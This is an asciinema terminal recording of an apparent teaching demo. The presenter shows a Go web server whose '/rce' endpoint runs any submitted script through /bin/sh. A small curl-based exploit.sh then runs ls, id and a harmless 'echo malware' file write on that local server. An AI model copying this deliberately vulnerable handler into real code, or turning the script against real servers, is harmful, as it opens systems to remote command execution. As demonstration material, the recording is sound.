{"width": 80, "env": {"TERM": "xterm-256color", "SHELL": "/bin/bash"}, "height": 24, "version": 2, "timestamp": 1548540283}
[0.009898, "o", "\u001b[?1049h\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b]112\u0007\u001b[?25l\u001b[1;1Hbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[30m\u001b[42m[preso] 0:preso*Z                             \"bmitch-asusr556l\" 17:04 26-Jan-19\u001b(B\u001b[m\u001b[24;1H\u001b[1;24r\u001b[H\u001b[51C\u001b[?12l\u001b[?25h"]
[1.007895, "o", "l"]
[1.103018, "o", "e"]
[1.352663, "o", "s"]
[1.525548, "o", "s"]
[1.925337, "o", "\u001b[C"]
[2.211936, "o", "m"]
[2.312593, "o", "a"]
[2.444875, "o", "i"]
[2.524391, "o", "n"]
[2.828377, "o", "."]
[3.010733, "o", "g"]
[3.116634, "o", "o"]
[3.527598, "o", "\r\n"]
[3.529681, "o", "\u001b[?25l\u001b[H\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2d\u001b[?12l\u001b[?25h\u001b[?1h\u001b=package\u001b[Cmain\u001b[4;1Himport\u001b[C(\n\"fmt\"\u001b[6;9H\"net/http\"\u001b[7;9H\"os/exec\"\r\n)\u001b[10;1Hfunc\u001b[Cmain()\u001b[C{\u001b[11;9Hhttp.HandleFunc(\"/\",\u001b[Croot)\u001b[12;9Hhttp.HandleFunc(\"/rce\",\u001b[Crce)\u001b[13;9Hfmt.Print(\"Ready\u001b[Cto\u001b[Creceive\u001b[Crequests\u001b[Con\u001b[Cport\u001b[C6666\\n\")\u001b[14;9Hhttp.ListenAndServe(\"127.0.0.1:6666\",\u001b[Cnil)\r\n}\u001b[17;1Hfunc\u001b[Croot(w\u001b[Chttp.ResponseWriter,\u001b[Cr\u001b[C*http.Request)\u001b[C{\u001b[18;9Hw.Header().Set(\"Server\",\u001b[C\"Very\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\")\u001b[19;9Hw.WriteHeader(200)\r\n}\u001b[22;1Hfunc\u001b[Crce(w\u001b[Chttp.ResponseWriter,\u001b[Cr\u001b[C*http.Request)\u001b[C{\u001b[1;23r\u001b[H\u001b[23;9Hscript\u001b[C:=\u001b[Cr.FormValue(\"script\")\r\n\u001b[7mmain.go"]
[3.529858, "o", "\u001b[1;24r\u001b[H\u001b[23;8H\u001b(B\u001b[m"]
[6.357787, "o", "\r\u001b[K\u001b[1;23r\u001b[H\u001b[23;9Hfmt.Printf(\"Running:\u001b[C%s\\n\",\u001b[Cscript)\r\n\u001b[8Ccmd\u001b[C:=\u001b[Cexec.Command(\"/bin/sh\",\u001b[C\"-c\",\u001b[Cscript)\r\n\u001b[8Coutput,\u001b[C_\u001b[C:=\u001b[Ccmd.Output()\r\n\u001b[8Cw.Header().Set(\"Server\",\u001b[C\"Very\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\")\r\n\u001b[8Cw.Write(output)\r\n}\r\n\n\u001b[7m(END)"]
[6.358018, "o", "\u001b[1;24r\u001b[H\u001b[23;6H\u001b(B\u001b[m"]
[7.904573, "o", "\u001b[?25l\u001b[H                                                                          \u001b[30m\u001b[43m[0/54]\u001b[2;1H\u001b[39m\u001b[49mfunc main() {\u001b[K\r\n        http.HandleFunc(\"/\", root)\u001b[K\r\n        http.HandleFunc(\"/rce\", rce)\u001b[K\r\n        fmt.Print(\"Ready to receive requests on port 6666\\n\")\u001b[K\r\n        http.ListenAndServe(\"127.0.0.1:6666\", nil)\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\nfunc root(w http.ResponseWriter, r *http.Request) {\u001b[K\r\n        w.Header().Set(\"Server\", \"Very Bad, No Good, Go Server\")\u001b[K\r\n        w.WriteHeader(200)\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\nfunc rce(w http.ResponseWriter, r *http.Request) {\u001b[K\r\n        script := r.FormValue(\"script\")\u001b[K\r\n        fmt.Printf(\"Running: %s\\n\", script)\u001b[K\r\n        cmd := exec.Command(\"/bin/sh\", \"-c\", script)\u001b[K\r\n        output, _ := cmd.Output()\u001b[K\r\n        w.Header().Set(\"Server\", \"Very Bad, No Good, Go Server\")\u001b[K\r\n        w.Write(output)\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[7m(END)\u001b(B\u001b[m\u001b[K\u001b[?12l\u001b[?25h\u001b[?1l\u001b>"]
[8.44454, "o", "\u001b[22;1H"]
[8.944777, "o", "\u001b[21;2H"]
[8.974892, "o", "\u001b[20;24H"]
[9.004083, "o", "\u001b[19;65H"]
[9.035079, "o", "\u001b[18;34H"]
[9.065865, "o", "\u001b[17;53H"]
[9.09525, "o", "\u001b[16;44H"]
[9.126627, "o", "\u001b[15;40H"]
[9.156514, "o", "\u001b[14;51H"]
[9.186867, "o", "\u001b[13;1H"]
[9.216181, "o", "\u001b[12;2H"]
[9.246924, "o", "\u001b[11;27H"]
[9.277268, "o", "\u001b[10;65H"]
[9.307695, "o", "\u001b[9;52H"]
[9.33814, "o", "\u001b[8;1H"]
[9.368403, "o", "\u001b[7;2H"]
[9.398401, "o", "\u001b[6;51H"]
[9.428385, "o", "\u001b[5;62H"]
[9.458563, "o", "\u001b[4;37H"]
[9.488522, "o", "\u001b[3;35H"]
[10.029086, "o", "\r\n"]
[10.386186, "o", "\u001b[30m\u001b[43m \r\u001b(B\u001b[m"]
[10.651324, "o", "\u001b[30m\u001b[43m        http.HandleFunc(\"/rce\", rce)                                            \u001b[5;1H \r\u001b(B\u001b[m"]
[13.917008, "o", "\u001b[30m\u001b[43m        fmt.Print(\"Ready to receive requests on port 6666\\n\")                   \u001b[6;1H \r\u001b(B\u001b[m"]
[14.41701, "o", "\u001b[30m\u001b[43m        http.ListenAndServe(\"127.0.0.1:6666\", nil)                              \u001b[7;1H}\r\u001b(B\u001b[m"]
[14.448009, "o", "\u001b[30m\u001b[43m}                                                                               \u001b[8;1H \r\u001b(B\u001b[m"]
[14.47824, "o", "\u001b[30m\u001b[43m                                                                                \u001b[9;1Hf\r\u001b(B\u001b[m"]
[14.508221, "o", "\u001b[30m\u001b[43mfunc root(w http.ResponseWriter, r *http.Request) {                             \u001b[10;1H \r\u001b(B\u001b[m"]
[14.538237, "o", "\u001b[30m\u001b[43m        w.Header().Set(\"Server\", \"Very Bad, No Good, Go Server\")                \u001b[11;1H \r\u001b(B\u001b[m"]
[14.569229, "o", "\u001b[30m\u001b[43m        w.WriteHeader(200)                                                      \u001b[12;1H}\r\u001b(B\u001b[m"]
[14.59955, "o", "\u001b[30m\u001b[43m}                                                                               \u001b[13;1H \r\u001b(B\u001b[m"]
[14.629714, "o", "\u001b[30m\u001b[43m                                                                                \u001b[14;1Hf\r\u001b(B\u001b[m"]
[14.659662, "o", "\u001b[30m\u001b[43mfunc rce(w http.ResponseWriter, r *http.Request) {                              \u001b[15;1H \r\u001b(B\u001b[m"]
[14.689923, "o", "\u001b[30m\u001b[43m        script := r.FormValue(\"script\")                                         \u001b[16;1H \r\u001b(B\u001b[m"]
[14.863194, "o", "\u001b[4d        http.HandleFunc(\"/rce\", rce)                                            \u001b[5;1H        fmt.Print(\"Ready to receive requests on port 6666\\n\")                   \u001b[6;1H        http.ListenAndServe(\"127.0.0.1:6666\", nil)                              \u001b[7;1H}                                                                               \u001b[8;1H                                                                                \u001b[9;1Hfunc root(w http.ResponseWriter, r *http.Request) {                             \u001b[10;1H        w.Header().Set(\"Server\", \"Very Bad, No Good, Go Server\")                \u001b[11;1H        w.WriteHeader(200)                                                      \u001b[12;1H}                                                                               \u001b[13;1H                                                                                \u001b[14;1Hfunc rce(w http.ResponseWriter, r *http.Request) {                              \u001b[15;1H        script := r.FormValue(\"script\")                             "]
[14.863382, "o", "            \u001b[16;1H\u001b[30m\u001b[43m \r\u001b(B\u001b[m"]
[15.000371, "o", "\u001b[30m\u001b[43m        fmt.Printf(\"Running: %s\\n\", script)                                     \u001b[17;1H \r\u001b(B\u001b[m"]
[15.495133, "o", "\u001b[30m\u001b[43m        cmd := exec.Command(\"/bin/sh\", \"-c\", script)                            \u001b[18;1H \r\u001b(B\u001b[m"]
[15.729704, "o", "\u001b[30m\u001b[43m        output, _ := cmd.Output()                                               \u001b[19;1H \r\u001b(B\u001b[m"]
[15.943426, "o", "\u001b[30m\u001b[43m        w.Header().Set(\"Server\", \"Very Bad, No Good, Go Server\")                \u001b[20;1H \r\u001b(B\u001b[m"]
[20.572863, "o", "\u001b[?25l\u001b[H\u001b[K\r\nfunc main() {\u001b[K\r\n        http.HandleFunc(\"/\", root)\u001b[K\r\n        http.HandleFunc(\"/rce\", rce)\u001b[K\r\n        fmt.Print(\"Ready to receive requests on port 6666\\n\")\u001b[K\r\n        http.ListenAndServe(\"127.0.0.1:6666\", nil)\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\nfunc root(w http.ResponseWriter, r *http.Request) {\u001b[K\r\n        w.Header().Set(\"Server\", \"Very Bad, No Good, Go Server\")\u001b[K\r\n        w.WriteHeader(200)\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\nfunc rce(w http.ResponseWriter, r *http.Request) {\u001b[K\r\n        script := r.FormValue(\"script\")\u001b[K\r\n        fmt.Printf(\"Running: %s\\n\", script)\u001b[K\r\n        cmd := exec.Command(\"/bin/sh\", \"-c\", script)\u001b[K\r\n        output, _ := cmd.Output()\u001b[K\r\n        w.Header().Set(\"Server\", \"Very Bad, No Good, Go Server\")\u001b[K\r\n        w.Write(output)\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[7m(END)\u001b(B\u001b[m\u001b[K\r\n\u001b[30m\u001b[42m[preso] 0:preso*Z                             \"bmitch-asusr556l\" 17:05 26-Jan-19\u001b(B\u001b[m\u001b[23;6H\u001b[?12l\u001b[?25h\u001b[?1h\u001b="]
[21.941003, "o", "\r\u001b[K\u001b[?25l\u001b[Hbmitch@bmitch-asusr556l:~/data/docker/golang-demo$ less main.go\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2d\u001b[?12l\u001b[?25h\u001b[?1l\u001b>"]
[21.941605, "o", "bmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[C"]
[23.538318, "o", "l"]
[23.633468, "o", "s"]
[24.246211, "o", "\u001b[C"]
[24.658861, "o", "-"]
[24.8767, "o", "l"]
[25.141855, "o", "\r\n"]
[25.144642, "o", "total\u001b[C16\r\n-rwxr-xr-x\u001b[C1\u001b[Cbmitch\u001b[Cbmitch\u001b[C101\u001b[CJan\u001b[C26\u001b[C11:04\u001b[C\u001b[32m\u001b[1mexploit.sh\r\n\u001b(B\u001b[m"]
[25.145057, "o", "-rw-r--r--\u001b[C1\u001b[Cbmitch\u001b[Cbmitch\u001b[2C42\u001b[CJan\u001b[C26\u001b[C09:07\u001b[Cgo.mod\r\n-rw-r--r--\u001b[C1\u001b[Cbmitch\u001b[Cbmitch\u001b[C635\u001b[CJan\u001b[C26\u001b[C15:41\u001b[Cmain.go\r\n-rw-r--r--\u001b[C1\u001b[Cbmitch\u001b[Cbmitch\u001b[C230\u001b[CJan\u001b[C26\u001b[C10:33\u001b[CREADME.md\r\n"]
[25.145216, "o", "bmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[C"]
[27.648005, "o", "g"]
[27.743219, "o", "o"]
[27.870284, "o", "\u001b[C"]
[28.007958, "o", "r"]
[28.162509, "o", "u"]
[28.375299, "o", "n"]
[28.438902, "o", "\u001b[C"]
[28.662733, "o", "m"]
[29.066333, "o", "a"]
[29.298566, "o", "i"]
[29.409862, "o", "n"]
[29.676091, "o", "."]
[29.819816, "o", "g"]
[29.949742, "o", "o"]
[30.267465, "o", "\r\n"]
[31.893567, "o", "\u001b[?25l\u001b[32m\u001b[3B─────────────────────────────────────────\u001b[39m───────────────────────────────────────\u001b[1;1H\u001b(B\u001b[mbmitch@bmitch-asusr556l:~/data/docker/golang-demo$ less main.go\u001b[K\r\nbmitch@bmitch-asusr556l:~/data/docker/golang-demo$ ls -l\u001b[K\r\ntotal 16\u001b[K\r\n-rwxr-xr-x 1 bmitch bmitch 101 Jan 26 11:04 \u001b[32m\u001b[1mexploit.sh\u001b(B\u001b[m\u001b[K\r\n-rw-r--r-- 1 bmitch bmitch  42 Jan 26 09:07 go.mod\u001b[K\r\n-rw-r--r-- 1 bmitch bmitch 635 Jan 26 15:41 main.go\u001b[K\r\n-rw-r--r-- 1 bmitch bmitch 230 Jan 26 10:33 README.md\u001b[K\r\nbmitch@bmitch-asusr556l:~/data/docker/golang-demo$ go run main.go\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2Bbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[30m\u001b[42m[preso] 0:preso*                              \"bmitch-asusr556l\" 17:05 26-Jan-19\u001b(B\u001b[m\u001b[9;1H\u001b[?12l\u001b[?25h"]
[32.407622, "o", "Ready\u001b[Cto\u001b[Creceive\u001b[Crequests\u001b[Con\u001b[Cport\u001b[C6666\r\n"]
[33.569049, "o", "\u001b[?25l\u001b[2B─────────────────────────────────────────\u001b[32m───────────────────────────────────────\u001b(B\u001b[m\u001b[13;52H\u001b[?12l\u001b[?25h"]
[34.702118, "o", "c"]
[34.876054, "o", "a"]
[34.976916, "o", "t"]
[35.10356, "o", "\u001b[C"]
[35.557316, "o", "e"]
[35.754897, "o", "x"]
[35.910957, "o", "p"]
[36.073505, "o", "loit.sh\u001b[C"]
[36.49338, "o", "\r\n"]
[36.494886, "o", "#!/bin/sh\u001b[16;1Hecho\u001b[C\"trying\u001b[Cto\u001b[Crun:\u001b[C$*\"\r\ncurl\u001b[C-i\u001b[C--data-urlencode\u001b[C\"script=$*\"\u001b[C-X\u001b[CPOST\u001b[Clocalhost:6666/rce\u001b[19;1H"]
[36.495328, "o", "bmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[C"]
[37.64435, "o", "."]
[37.776439, "o", "/"]
[37.989179, "o", "e"]
[38.180789, "o", "x"]
[38.508525, "o", "ploit.sh\u001b[C"]
[40.510659, "o", "l"]
[40.60593, "o", "s"]
[40.72766, "o", "\u001b[C"]
[40.974806, "o", "-"]
[41.209341, "o", "l"]
[41.78326, "o", "\r\n"]
[41.784838, "o", "trying\u001b[Cto\u001b[Crun:\u001b[Cls\u001b[C-l\r\n"]
[41.798753, "o", "\u001b[10dRunning:\u001b[Cls\u001b[C-l\u001b[21;1H"]
[41.802466, "o", "HTTP/1.1\u001b[C200\u001b[COK\r\nServer:\u001b[CVery\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\u001b[13;23r\u001b[H\u001b[23dDate:\u001b[CSat,\u001b[C26\u001b[CJan\u001b[C2019\u001b[C22:05:25\u001b[CGMT\r\nContent-Length:\u001b[C205\r\nContent-Type:\u001b[Ctext/plain;\u001b[Ccharset=utf-8\r\n\ntotal\u001b[C16\r\n-rw-r--r--\u001b[C1\u001b[C1000\u001b[C1000\u001b[C230\u001b[CJan\u001b[C26\u001b[C15:33\u001b[CREADME.md\r\n-rwxr-xr-x\u001b[C1\u001b[C1000\u001b[C1000\u001b[C101\u001b[CJan\u001b[C26\u001b[C16:04\u001b[Cexploit.sh\r\n-rw-r--r--\u001b[C1\u001b[C1000\u001b[C1000\u001b[2C42\u001b[CJan\u001b[C26\u001b[C14:07\u001b[Cgo.mod\r\n-rw-r--r--\u001b[C1\u001b[C1000\u001b[C1000\u001b[C635\u001b[CJan\u001b[C26\u001b[C20:41\u001b[Cmain.go\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[41.803801, "o", "\u001b[13;23r\u001b[H\u001b[23dbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[1;24r\u001b[H\u001b[23;52H"]
[44.153086, "o", "\u001b[13;23r\u001b[H\u001b[23;52H./exploit.sh\u001b[Cls\u001b[C-l\u001b[1;24r\u001b[H\u001b[23;70H"]
[44.915263, "o", "\b\u001b[K"]
[45.084398, "o", "\b\u001b[K"]
[45.251753, "o", "\b\u001b[K"]
[45.402363, "o", "\b\u001b[K"]
[45.559482, "o", "\b\u001b[K"]
[45.89772, "o", "\u001b[13;23r\u001b[H\u001b[23;65Hi\u001b[1;24r\u001b[H\u001b[23;66H"]
[46.008803, "o", "\u001b[13;23r\u001b[H\u001b[23;66Hd\u001b[1;24r\u001b[H\u001b[23;67H"]
[46.237127, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[1;24r\u001b[H\u001b[23d"]
[46.238703, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cid\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[46.252968, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Cid\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[46.286758, "o", "\u001b[13;23r\u001b[H\u001b[23dHTTP/1.1\u001b[C200\u001b[COK\r\nServer:\u001b[CVery\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\r\nDate:\u001b[CSat,\u001b[C26\u001b[CJan\u001b[C2019\u001b[C22:05:30\u001b[CGMT\r\nContent-Length:\u001b[C30\r\nContent-Type:\u001b[Ctext/plain;\u001b[Ccharset=utf-8\r\n\nuid=1000\u001b[Cgid=1000\u001b[Cgroups=1000\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[46.288578, "o", "\u001b[13;23r\u001b[H\u001b[23dbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[1;24r\u001b[H\u001b[23;52H"]
[49.4465, "o", "\u001b[13;23r\u001b[H\u001b[23;52H./exploit.sh\u001b[Cid\u001b[1;24r\u001b[H\u001b[23;67H"]
[50.108192, "o", "\b\u001b[K"]
[50.27074, "o", "\b\u001b[K"]
[50.852917, "o", "\u001b[13;23r\u001b[H\u001b[23;65He\u001b[1;24r\u001b[H\u001b[23;66H"]
[51.321041, "o", "\u001b[13;23r\u001b[H\u001b[23;66Hx\u001b[1;24r\u001b[H\u001b[23;67H"]
[51.720002, "o", "\b\u001b[K"]
[51.747066, "o", "\u001b[13;23r\u001b[H\u001b[23;66Hc\u001b[1;24r\u001b[H\u001b[23;67H"]
[52.055659, "o", "\u001b[13;23r\u001b[H\u001b[23;67Hh\u001b[1;24r\u001b[H\u001b[23;68H"]
[52.419715, "o", "\u001b[13;23r\u001b[H\u001b[23;68Ho\u001b[1;24r\u001b[H\u001b[23;69H"]
[52.649562, "o", "\u001b[C"]
[52.88879, "o", "\u001b[13;23r\u001b[H\u001b[23;70Hm\u001b[1;24r\u001b[H\u001b[23;71H"]
[53.010728, "o", "\u001b[13;23r\u001b[H\u001b[23;71Ha\u001b[1;24r\u001b[H\u001b[23;72H"]
[53.161826, "o", "\u001b[13;23r\u001b[H\u001b[23;72Hl\u001b[1;24r\u001b[H\u001b[23;73H"]
[53.444158, "o", "\u001b[13;23r\u001b[H\u001b[23;73Hw\u001b[1;24r\u001b[H\u001b[23;74H"]
[53.486464, "o", "\u001b[13;23r\u001b[H\u001b[23;74Ha\u001b[1;24r\u001b[H\u001b[23;75H"]
[53.734347, "o", "\u001b[13;23r\u001b[H\u001b[23;75Hr\u001b[1;24r\u001b[H\u001b[23;76H"]
[54.235221, "o", "\u001b[13;23r\u001b[H\u001b[23;76He\u001b[1;24r\u001b[H\u001b[23;77H"]
[54.499386, "o", "\u001b[C"]
[54.876256, "o", "\u001b[13;23r\u001b[H\u001b[23;78H\\\u001b[1;24r\u001b[H\u001b[23;79H"]
[55.225469, "o", "\u001b[13;23r\u001b[H\u001b[23;79H>\u001b[1;24r\u001b[H\u001b[23;80H"]
[55.744359, "o", "\u001b[13;23r\u001b[H\u001b[23;80H  \u001b[1;24r\u001b[H\u001b[23d"]
[56.094033, "o", "\u001b[13;23r\u001b[H\u001b[23dm\u001b[1;24r\u001b[H\u001b[23;2H"]
[56.189253, "o", "\u001b[13;23r\u001b[H\u001b[23;2Ha\u001b[1;24r\u001b[H\u001b[23;3H"]
[56.342527, "o", "\u001b[13;23r\u001b[H\u001b[23;3Hl\u001b[1;24r\u001b[H\u001b[23;4H"]
[56.590056, "o", "\u001b[13;23r\u001b[H\u001b[23;4Hw\u001b[1;24r\u001b[H\u001b[23;5H"]
[56.706585, "o", "\u001b[13;23r\u001b[H\u001b[23;5Ha\u001b[1;24r\u001b[H\u001b[23;6H"]
[56.870743, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hr\u001b[1;24r\u001b[H\u001b[23;7H"]
[56.918401, "o", "\u001b[13;23r\u001b[H\u001b[23;7He\u001b[1;24r\u001b[H\u001b[23;8H"]
[57.414718, "o", "\u001b[13;23r\u001b[H\u001b[23;8H.\u001b[1;24r\u001b[H\u001b[23;9H"]
[57.575273, "o", "\u001b[13;23r\u001b[H\u001b[23;9Hs\u001b[1;24r\u001b[H\u001b[23;10H"]
[57.733735, "o", "\u001b[13;23r\u001b[H\u001b[23;10Hh\u001b[1;24r\u001b[H\u001b[23;11H"]
[58.646845, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[1;24r\u001b[H\u001b[23d"]
[58.64792, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cecho\u001b[Cmalware\u001b[C>\u001b[Cmalware.sh\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[58.662686, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Cecho\u001b[Cmalware\u001b[C>\u001b[Cmalware.sh\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[58.663852, "o", "\u001b[13;23r\u001b[H\u001b[23dHTTP/1.1\u001b[C200\u001b[COK\r\nServer:\u001b[CVery\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\r\nDate:\u001b[CSat,\u001b[C26\u001b[CJan\u001b[C2019\u001b[C22:05:42\u001b[CGMT\r\nContent-Length:\u001b[C0\r\n\n\u001b[1;24r\u001b[H\u001b[23d"]
[58.665423, "o", "\u001b[13;23r\u001b[H\u001b[23dbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[1;24r\u001b[H\u001b[23;52H"]
[61.465694, "o", "\u001b[13;23r\u001b[H\u001b[23;52H./exploit.sh\u001b[Cecho\u001b[Cmalware\u001b[C\\> malware.sh\u001b[1;24r\u001b[H\u001b[23;11H"]
[61.642849, "o", "\u001b[22;67H\u001b[K\r\n\u001b[K\u001b[22;65Hid"]
[62.427493, "o", "\b\bls\u001b[C-l"]
[63.109454, "o", "\r\n"]
[63.110439, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cls\u001b[C-l\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[63.125695, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Cls\u001b[C-l\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[63.129245, "o", "\u001b[13;23r\u001b[H\u001b[23dHTTP/1.1\u001b[C200\u001b[COK\r\nServer:\u001b[CVery\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\r\nDate:\u001b[CSat,\u001b[C26\u001b[CJan\u001b[C2019\u001b[C22:05:46\u001b[CGMT\r\nContent-Length:\u001b[C256\r\nContent-Type:\u001b[Ctext/plain;\u001b[Ccharset=utf-8\r\n\ntotal\u001b[C20\r\n-rw-r--r--\u001b[C1\u001b[C1000\u001b[C1000\u001b[C230\u001b[CJan\u001b[C26\u001b[C15:33\u001b[CREADME.md\r\n-rwxr-xr-x\u001b[C1\u001b[C1000\u001b[C1000\u001b[C101\u001b[CJan\u001b[C26\u001b[C16:04\u001b[Cexploit.sh\r\n-rw-r--r--\u001b[C1\u001b[C1000\u001b[C1000\u001b[2C42\u001b[CJan\u001b[C26\u001b[C14:07\u001b[Cgo.mod\r\n-rw-r--r--\u001b[C1\u001b[C1000\u001b[C1000\u001b[C635\u001b[CJan\u001b[C26\u001b[C20:41\u001b[Cmain.go\r\n-rw-r--r--\u001b[C1\u001b[C1000\u001b[C1000\u001b[3C8\u001b[CJan\u001b[C26\u001b[C22:05\u001b[Cmalware.sh\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[63.130728, "o", "\u001b[13;23r\u001b[H\u001b[23dbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[1;24r\u001b[H\u001b[23;52H"]
[67.341139, "o", "\u001b[13;23r\u001b[H\u001b[23;52H./exploit.sh\u001b[Cls\u001b[C-l\u001b[1;24r\u001b[H\u001b[23;70H"]
[68.337606, "o", "\b\u001b[K"]
[68.502707, "o", "\b\u001b[K"]
[68.673917, "o", "\b\u001b[K"]
[68.839063, "o", "\b\u001b[K"]
[68.99424, "o", "\b\u001b[K"]
[69.101481, "o", "\u001b[13;23r\u001b[H\u001b[23;65Hc\u001b[1;24r\u001b[H\u001b[23;66H"]
[69.336509, "o", "\u001b[13;23r\u001b[H\u001b[23;66Ha\u001b[1;24r\u001b[H\u001b[23;67H"]
[69.469524, "o", "\u001b[13;23r\u001b[H\u001b[23;67Ht\u001b[1;24r\u001b[H\u001b[23;68H"]
[69.65739, "o", "\u001b[C"]
[69.923075, "o", "\u001b[13;23r\u001b[H\u001b[23;69Hm\u001b[1;24r\u001b[H\u001b[23;70H"]
[70.034143, "o", "\u001b[13;23r\u001b[H\u001b[23;70Ha\u001b[1;24r\u001b[H\u001b[23;71H"]
[70.155067, "o", "\u001b[13;23r\u001b[H\u001b[23;71Hl\u001b[1;24r\u001b[H\u001b[23;72H"]
[70.39413, "o", "\u001b[13;23r\u001b[H\u001b[23;72Hw\u001b[1;24r\u001b[H\u001b[23;73H"]
[70.494648, "o", "\u001b[13;23r\u001b[H\u001b[23;73Ha\u001b[1;24r\u001b[H\u001b[23;74H"]
[71.317127, "o", "\u001b[13;23r\u001b[H\u001b[23;74Hr\u001b[1;24r\u001b[H\u001b[23;75H"]
[71.406914, "o", "\u001b[13;23r\u001b[H\u001b[23;75He\u001b[1;24r\u001b[H\u001b[23;76H"]
[71.645223, "o", "\u001b[13;23r\u001b[H\u001b[23;76H.\u001b[1;24r\u001b[H\u001b[23;77H"]
[72.669325, "o", "\u001b[13;23r\u001b[H\u001b[23;77Hs\u001b[1;24r\u001b[H\u001b[23;78H"]
[72.817146, "o", "\u001b[13;23r\u001b[H\u001b[23;78Hh\u001b[1;24r\u001b[H\u001b[23;79H"]
[73.277307, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[1;24r\u001b[H\u001b[23d"]
[73.278832, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Ccat\u001b[Cmalware.sh\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[73.293439, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Ccat\u001b[Cmalware.sh\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[73.317199, "o", "\u001b[13;23r\u001b[H\u001b[23dHTTP/1.1\u001b[C200\u001b[COK\r\nServer:\u001b[CVery\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\r\nDate:\u001b[CSat,\u001b[C26\u001b[CJan\u001b[C2019\u001b[C22:05:57\u001b[CGMT\r\nContent-Length:\u001b[C8\r\nContent-Type:\u001b[Ctext/plain;\u001b[Ccharset=utf-8\r\n\nmalware\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[73.319175, "o", "\u001b[13;23r\u001b[H\u001b[23dbmitch@bmitch-asusr556l:~/data/docker/golang-demo$\u001b[1;24r\u001b[H\u001b[23;52H"]
[78.706644, "o", "\u001b[13;23r\u001b[H\u001b[23;52H./exploit.sh\u001b[Ccat\u001b[Cmalware.sh\u001b[1;24r\u001b[H\u001b[23;79H"]
[79.178342, "o", "\b"]
[79.678566, "o", "\b"]
[79.70955, "o", "\b"]
[79.738519, "o", "\b"]
[79.768385, "o", "\b"]
[79.799205, "o", "\b"]
[79.830148, "o", "\b"]
[79.860933, "o", "\b"]
[79.890702, "o", "\b"]
